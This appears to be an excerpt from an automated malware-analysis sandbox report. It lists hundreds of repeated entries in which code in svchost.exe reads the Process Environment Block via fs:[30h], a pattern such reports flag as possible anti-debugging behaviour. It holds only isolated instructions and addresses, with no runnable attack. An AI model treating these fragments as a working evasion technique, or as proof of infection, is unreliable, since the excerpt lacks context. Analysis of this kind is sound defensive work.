            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB8243 mov ecx, dword ptr fs:[00000030h]2_2_03AB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0625D mov eax, dword ptr fs:[00000030h]2_2_03B0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A250 mov eax, dword ptr fs:[00000030h]2_2_03A2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36259 mov eax, dword ptr fs:[00000030h]2_2_03A36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]2_2_03AEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA250 mov eax, dword ptr fs:[00000030h]2_2_03AEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A70185 mov eax, dword ptr fs:[00000030h]2_2_03A70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEC188 mov eax, dword ptr fs:[00000030h]2_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]2_2_03AD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD4180 mov eax, dword ptr fs:[00000030h]2_2_03AD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB019F mov eax, dword ptr fs:[00000030h]2_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A197 mov eax, dword ptr fs:[00000030h]2_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B061E5 mov eax, dword ptr fs:[00000030h]2_2_03B061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A601F8 mov eax, dword ptr fs:[00000030h]2_2_03A601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF61C3 mov eax, dword ptr fs:[00000030h]2_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60124 mov eax, dword ptr fs:[00000030h]2_2_03A60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov eax, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADE10E mov ecx, dword ptr fs:[00000030h]2_2_03ADE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov ecx, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA118 mov eax, dword ptr fs:[00000030h]2_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF0115 mov eax, dword ptr fs:[00000030h]2_2_03AF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h]2_2_03B04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04164 mov eax, dword ptr fs:[00000030h]2_2_03B04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov ecx, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC4144 mov eax, dword ptr fs:[00000030h]2_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C156 mov eax, dword ptr fs:[00000030h]2_2_03A2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC8158 mov eax, dword ptr fs:[00000030h]2_2_03AC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A36154 mov eax, dword ptr fs:[00000030h]2_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A280A0 mov eax, dword ptr fs:[00000030h]2_2_03A280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC80A8 mov eax, dword ptr fs:[00000030h]2_2_03AC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov eax, dword ptr fs:[00000030h]2_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3208A mov eax, dword ptr fs:[00000030h]2_2_03A3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03A2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A380E9 mov eax, dword ptr fs:[00000030h]2_2_03A380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB60E0 mov eax, dword ptr fs:[00000030h]2_2_03AB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03A2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A720F0 mov ecx, dword ptr fs:[00000030h]2_2_03A720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB20DE mov eax, dword ptr fs:[00000030h]2_2_03AB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2A020 mov eax, dword ptr fs:[00000030h]2_2_03A2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C020 mov eax, dword ptr fs:[00000030h]2_2_03A2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6030 mov eax, dword ptr fs:[00000030h]2_2_03AC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4000 mov ecx, dword ptr fs:[00000030h]2_2_03AB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD2000 mov eax, dword ptr fs:[00000030h]2_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E016 mov eax, dword ptr fs:[00000030h]2_2_03A4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C073 mov eax, dword ptr fs:[00000030h]2_2_03A5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32050 mov eax, dword ptr fs:[00000030h]2_2_03A32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6050 mov eax, dword ptr fs:[00000030h]2_2_03AB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A307AF mov eax, dword ptr fs:[00000030h]2_2_03A307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE47A0 mov eax, dword ptr fs:[00000030h]2_2_03AE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD678E mov eax, dword ptr fs:[00000030h]2_2_03AD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A527ED mov eax, dword ptr fs:[00000030h]2_2_03A527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE7E1 mov eax, dword ptr fs:[00000030h]2_2_03ABE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A347FB mov eax, dword ptr fs:[00000030h]2_2_03A347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03A3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB07C3 mov eax, dword ptr fs:[00000030h]2_2_03AB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C720 mov eax, dword ptr fs:[00000030h]2_2_03A6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov ecx, dword ptr fs:[00000030h]2_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6273C mov eax, dword ptr fs:[00000030h]2_2_03A6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAC730 mov eax, dword ptr fs:[00000030h]2_2_03AAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C700 mov eax, dword ptr fs:[00000030h]2_2_03A6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30710 mov eax, dword ptr fs:[00000030h]2_2_03A30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60710 mov eax, dword ptr fs:[00000030h]2_2_03A60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38770 mov eax, dword ptr fs:[00000030h]2_2_03A38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40770 mov eax, dword ptr fs:[00000030h]2_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov esi, dword ptr fs:[00000030h]2_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6674D mov eax, dword ptr fs:[00000030h]2_2_03A6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30750 mov eax, dword ptr fs:[00000030h]2_2_03A30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABE75D mov eax, dword ptr fs:[00000030h]2_2_03ABE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72750 mov eax, dword ptr fs:[00000030h]2_2_03A72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4755 mov eax, dword ptr fs:[00000030h]2_2_03AB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03A6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A666B0 mov eax, dword ptr fs:[00000030h]2_2_03A666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A34690 mov eax, dword ptr fs:[00000030h]2_2_03A34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03AAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB06F1 mov eax, dword ptr fs:[00000030h]2_2_03AB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03A6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E627 mov eax, dword ptr fs:[00000030h]2_2_03A4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A66620 mov eax, dword ptr fs:[00000030h]2_2_03A66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A68620 mov eax, dword ptr fs:[00000030h]2_2_03A68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3262C mov eax, dword ptr fs:[00000030h]2_2_03A3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAE609 mov eax, dword ptr fs:[00000030h]2_2_03AAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4260B mov eax, dword ptr fs:[00000030h]2_2_03A4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72619 mov eax, dword ptr fs:[00000030h]2_2_03A72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF866E mov eax, dword ptr fs:[00000030h]2_2_03AF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A660 mov eax, dword ptr fs:[00000030h]2_2_03A6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A62674 mov eax, dword ptr fs:[00000030h]2_2_03A62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4C640 mov eax, dword ptr fs:[00000030h]2_2_03A4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB05A7 mov eax, dword ptr fs:[00000030h]2_2_03AB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A545B1 mov eax, dword ptr fs:[00000030h]2_2_03A545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32582 mov eax, dword ptr fs:[00000030h]2_2_03A32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32582 mov ecx, dword ptr fs:[00000030h]2_2_03A32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A64588 mov eax, dword ptr fs:[00000030h]2_2_03A64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E59C mov eax, dword ptr fs:[00000030h]2_2_03A6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E5E7 mov eax, dword ptr fs:[00000030h]2_2_03A5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A325E0 mov eax, dword ptr fs:[00000030h]2_2_03A325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]2_2_03A6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6C5ED mov eax, dword ptr fs:[00000030h]2_2_03A6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]2_2_03A6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E5CF mov eax, dword ptr fs:[00000030h]2_2_03A6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A365D0 mov eax, dword ptr fs:[00000030h]2_2_03A365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03A6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6A5D0 mov eax, dword ptr fs:[00000030h]2_2_03A6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40535 mov eax, dword ptr fs:[00000030h]2_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5E53E mov eax, dword ptr fs:[00000030h]2_2_03A5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC6500 mov eax, dword ptr fs:[00000030h]2_2_03AC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B04500 mov eax, dword ptr fs:[00000030h]2_2_03B04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6656A mov eax, dword ptr fs:[00000030h]2_2_03A6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]2_2_03A38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A38550 mov eax, dword ptr fs:[00000030h]2_2_03A38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A364AB mov eax, dword ptr fs:[00000030h]2_2_03A364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A644B0 mov ecx, dword ptr fs:[00000030h]2_2_03A644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABA4B0 mov eax, dword ptr fs:[00000030h]2_2_03ABA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEA49A mov eax, dword ptr fs:[00000030h]2_2_03AEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A304E5 mov ecx, dword ptr fs:[00000030h]2_2_03A304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2E420 mov eax, dword ptr fs:[00000030h]2_2_03A2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2C427 mov eax, dword ptr fs:[00000030h]2_2_03A2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB6420 mov eax, dword ptr fs:[00000030h]2_2_03AB6420
